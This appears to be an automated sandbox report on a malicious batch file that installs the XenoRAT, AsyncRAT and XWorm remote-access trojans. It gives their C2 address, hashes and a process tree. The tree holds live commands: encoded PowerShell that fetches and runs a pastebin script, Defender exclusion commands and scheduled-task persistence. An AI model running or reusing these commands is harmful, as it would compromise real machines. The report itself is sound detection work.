Overview

overview

10

Static

static

1

LHVWN_virus_src.bat

windows10-ltsc 2021-x64

10

LHVWN_virus_src.bat

windows11-21h2-x64

10

Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

  • max time kernel
    1795s
  • max time network
    1800s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-12-2024 23:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LHVWN_virus_src.bat

  • Size

    680B

  • MD5

    28a24f08a62dc5c8af6be5e921d4c5ad

  • SHA1

    97f70c14a8e2ba4da9d8f5d65961d7d998ebb637

  • SHA256

    c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

  • SHA512

    e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Score
10/10
asyncratxenoratxwormcomppkgsrvdiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Family

xenorat

C2

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5sfsafsa789fyahufas

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4445

  • startup_name

    svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

C2

82.13.154.169:4446

Attributes
  • delay

    5

  • install

    true

  • install_file

    CompPkgSrv.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

82.13.154.169:4444

Attributes
  • Install_directory

    %AppData%

  • install_file

    CompPkgSup.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Xenorat family
    xenorat
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 35 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Users\Admin\AppData\Local\svchost.exe
              "C:\Users\Admin\AppData\Local\svchost.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1688
              • C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
                "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5108
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFCA0.tmp" /F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2696
            • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
              "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:840
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3600
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4776
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2BA.tmp.bat""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4064
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1700
                • C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
                  "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:484
            • C:\Users\Admin\AppData\Local\CompPkgSup.exe
              "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3420
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4704
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5012
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4124
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2328
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1880
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1028
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4996
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3316
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4024
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4708
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4696
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2144
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4108
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4852
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1300
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4512
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2404
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3676
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2760
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2944
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2428
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4180
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4572
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4964
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4060
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2488
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2552
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5100
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4520
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3512
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:868
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5004
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
    Filesize

    63KB

    MD5

    8638cc0d3500789aa3150223f6250016

    SHA1

    77a0dad2b97072988baed56fc208664ef1b182c9

    SHA256

    7ea1f9204c8a9a90eea81e51b6ac5a6dbad96e961f068b2cb63590b04ae7f972

    SHA512

    9ea193f04f6b8b1c2cc0c32b1f47ede423c3cffa5fa1cdc453aef307c1db693895cec0c4cfa3f595655976149c17d1d33e51a2891274e2d7588f018fd8c53c0d

    Download Submit

  • C:\Users\Admin\AppData\Local\CompPkgSup.exe
    Filesize

    80KB

    MD5

    82ae01d348fce7ddf9f19ca5cb545ae1

    SHA1

    5b563cec5b49c7ec4082bf19aeccce9fc190bd2a

    SHA256

    4a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d

    SHA512

    6a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log
    Filesize

    871B

    MD5

    1569f2c982851def168a6a1dad27317a

    SHA1

    cca0d9a1aca7b213c527efec865e1caee36fa127

    SHA256

    fc9a4ce0e2bd7b632291798d9b436861bd9006b858ee148811201ebfe6458e26

    SHA512

    78c9101c78f685829db5314a10f45485813b2ede4561facaa5f965d94077772a2e445610631be15230df27aaeacee08ddd4cd02a9398a5e3877e5b6c16bbe2c1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSup.exe.log
    Filesize

    654B

    MD5

    2cbbb74b7da1f720b48ed31085cbd5b8

    SHA1

    79caa9a3ea8abe1b9c4326c3633da64a5f724964

    SHA256

    e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

    SHA512

    ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    88dc70c361a22feac57b031dd9c1f02f

    SHA1

    a9b4732260c2a323750022a73480f229ce25d46d

    SHA256

    43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

    SHA512

    19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
    Filesize

    226B

    MD5

    1294de804ea5400409324a82fdc7ec59

    SHA1

    9a39506bc6cadf99c1f2129265b610c69d1518f7

    SHA256

    494398ec6108c68573c366c96aae23d35e7f9bdbb440a4aab96e86fcad5871d0

    SHA512

    033905cc5b4d0c0ffab2138da47e3223765146fa751c9f84b199284b653a04874c32a23aae577d2e06ce6c6b34fec62331b5fc928e3baf68dc53263ecdfa10c1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    ce136cbd6e9d6c16b44e3e73e2df1409

    SHA1

    5551fc3c91899a48419cd3da435f5016dfe638c7

    SHA256

    abfac24fdf6e96f5de30fa86b51d2043cee37c01b4286f80b33a2813499d9b65

    SHA512

    dc540e8593c2fddd8f35a5dabc689aa1e3af1e7c466389820821604bd5f148c2e46d081f2c7a46bfc3b67e02ffc066226b9850118b7cff6997546a4c0392582f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    050578bcbe71fcf8467e66dd700f1a0b

    SHA1

    edc182f324a85f530077aff358c2b5269b088fc1

    SHA256

    ac02bf4fb18fffdf076eb0ef1169af67cbcb1306a009f4821f3b8546764b4a50

    SHA512

    f0ba63e42038eaf1017367674ad0dde48e7f39e1473680247027b07cf7aa03562cc52b9f91b1f63eaa684235f42d78761e522cacaad2a4fac9f1e8f96685d381

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    69416944dac24129d0969e2ac46f0533

    SHA1

    d71969659956b32411e0606a9bee640a0b108ef4

    SHA256

    dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca

    SHA512

    aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    dbec78f13dedb2ee53e7e692aa8035c4

    SHA1

    c9aee6efd410f7b4e6f374b8a6fae85dc3ef82ea

    SHA256

    dd83d28d1454b9e1baced9436e016c54a4b8404657ecd002a4a3084fa8f8f80d

    SHA512

    13c9bfed6acedcc68ef84627716a90933a0bcce440e53c5e735784f476f1b18a8966320d41e7058ab10a53ac4e162ece5af68e755b120389b0d26f67ba1fc4f5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ouebz4z0.kv1.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp2BA.tmp.bat
    Filesize

    153B

    MD5

    21efe8ac7d25e6304adc6e93a56e2e07

    SHA1

    c45203d26402909d23aff152be2e844a3ff38a66

    SHA256

    6f532e3be954e6259aee7bdbfd99f87c1b9dece41e162986894cc75b72094ca1

    SHA512

    9ed29389b0a3cad6518fd55717be34110d5f31686420d108cd402b8510684dcebd35e01f96bd518701831470b146e28be558646e3be98eb4508056fc951e342f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpFCA0.tmp
    Filesize

    1KB

    MD5

    9cb9f8ba5ba99c36d5ba7ee5a98f0bd9

    SHA1

    4bb53c5f5d4f208a4082b59b0c4b5185866cd874

    SHA256

    dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c

    SHA512

    eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76

    Download Submit

  • C:\Users\Admin\AppData\Local\svchost.exe
    Filesize

    46KB

    MD5

    f9e58cfff3f013e9a9e679154dc5e320

    SHA1

    e0ade5edcd0de118cac9a772d8455a29a01e5574

    SHA256

    af0eb856e782c2ebef04155a860ba81731f10ec95ae04df12e364deef807307a

    SHA512

    c25758bb8346839b7a7be3d2d3a496924fbeecabd1d7c8671bb75aa0c36ae905b0048ae48ffaad43175d017a5f71e5c0c7d6a300d1b17de85f869ae02fe3f080

    Download Submit

  • C:\Users\Admin\AppData\Local\sysboot.ps1
    Filesize

    1KB

    MD5

    81f7df2e0aa206d331d8987c1035cef1

    SHA1

    51e8454a79b2f8127d96663c6a74f88b1f139f2a

    SHA256

    4d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a

    SHA512

    6defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d

    Download Submit

  • memory/840-89-0x0000000000EC0000-0x0000000000ED6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1688-64-0x00000000006D0000-0x00000000006E2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2012-12-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2012-16-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2012-0-0x00007FFB50323000-0x00007FFB50325000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2012-11-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2012-10-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2012-6-0x000001E4D2980000-0x000001E4D29A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2044-101-0x0000000000160000-0x000000000017A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4800-18-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4800-17-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4800-33-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4800-19-0x00007FFB50320000-0x00007FFB50DE2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4800-29-0x000001606C070000-0x000001606C816000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/5112-51-0x00000245FFEC0000-0x00000245FFF06000-memory.dmp

    Filesize

    280KB

    Download